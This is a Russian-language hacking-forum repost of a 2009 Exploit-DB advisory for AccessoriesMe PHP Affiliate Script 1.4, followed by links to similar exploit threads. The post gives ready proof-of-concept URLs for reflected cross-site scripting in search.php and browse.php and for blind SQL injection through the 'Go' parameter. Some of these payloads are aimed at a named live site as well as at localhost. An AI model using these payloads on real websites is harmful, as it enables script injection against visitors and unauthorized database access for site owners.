Exploit AccessoriesMe PHP Affiliate Script 1.4 - Blind SQL Injection / Cross-Site Scripting

Exploiter

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
9370
Проверка EDB
  1. Пройдено
Автор
MOUDI
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2009-4985 cve-2009-4984
Дата публикации
2009-08-05
Код: 
/*

              _____       _ ___        __          
             | ____|_   _(_) \ \      / /_ _ _   _ 
             |  _| \ \ / / | |\ \ /\ / / _` | | | |
             | |___ \ V /| | | \ V  V / (_| | |_| |
             |_____| \_/ |_|_|  \_/\_/ \__,_|\__, |
                                              |___/ 
                                    _____                    
                                   |_   _|__  __ _ _ __ ___  
                                      | |/ _ \/ _` | '_ ` _ \ 
                                      | |  __/ (_| | | | | | |
                                      |_|\___|\__,_|_| |_| |_|

AccessoriesMe PHP Affiliate Script v1.4 (bSQL-XSS) Multiple Remote Vulnerabilities

Discovered By : Moudi
Contact : <[email protected]>
Download : http://www.accessories.me.uk/downloadscript/download.php?u=latest/PHPAffiliateScript.zip&f=database/Affiliate-Script.dat

Greetings : Mizoz, Zuka, str0ke, 599eme Man.

*/

[+] Exploit XSS:

- Vulnerable code in search.php (Keywords).
- Vulnerable code in browse.php (SearchIndex).

- Poc:
  http://127.0.0.1/search.php?Keywords=[XSS]
  http://127.0.0.1/browse.php?SearchIndex=[XSS]
  http://ipod.accessories.me.uk/search.php?Keywords=1>"><ScRiPt %0D%0A>alert(412646446896)%3B</ScRiPt>
  http://ipod.accessories.me.uk/browse.php?SearchIndex=1>"><ScRiPt %0D%0A>alert(412646446896)%3B</ScRiPt>

[+] Exploit bSQL:

- Vulnerable code in browse.php (SearchIndex).

- Poc:
  http://127.0.0.1/browse.php?SearchIndex=PCHardware&BrowseNode=[NB]&sort=psrank&Go=[bSQL]
  http://ipod.accessories.me.uk/browse.php?SearchIndex=PCHardware&BrowseNode=3221551&sort=psrank&Go=Submit and 1=1 TRUE
  http://ipod.accessories.me.uk/browse.php?SearchIndex=PCHardware&BrowseNode=3221551&sort=psrank&Go=Submit and 1=2 FALSE

# milw0rm.com [2009-08-05]
 
Источник
www.exploit-db.com
Войдите или зарегистрируйтесь для ответа.

Похожие темы

Exploiter
Exploit KB Affiliate Referral Script 1.0 - Authentication Bypass
Ответы
0
Просмотры
613
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Shopzilla Affiliate Script PHP - 'search.php' Cross-Site Scripting
Ответы
0
Просмотры
418
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Affiliate Store Builder - 'edit_cms.php' Multiple SQL Injections
Ответы
0
Просмотры
427
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Edgephp ClickBank Affiliate Marketplace Script - Multiple Vulnerabilities
Ответы
0
Просмотры
385
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Shopping Cart Script with Affiliate Program - SQL Injection
Ответы
0
Просмотры
404
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Web4Future Affiliate Manager PRO 4.1 - 'functions.php' SQL Injection
Ответы
0
Просмотры
357
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Post Affiliate Pro 2.0.4 - 'index.php' SQL Injection
Ответы
0
Просмотры
364
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Joomla! Component Affiliate Datafeeds 880 - Local File Inclusion
Ответы
0
Просмотры
358
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit BPAffiliate Affiliate Tracking - Authentication Bypass
Ответы
0
Просмотры
354
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Alstrasoft Affiliate Network Pro 8.0 - 'pgmid' SQL Injection
Ответы
0
Просмотры
351
Эксплойты & Уязвимости
Exploiter
Exploiter
Сверху Снизу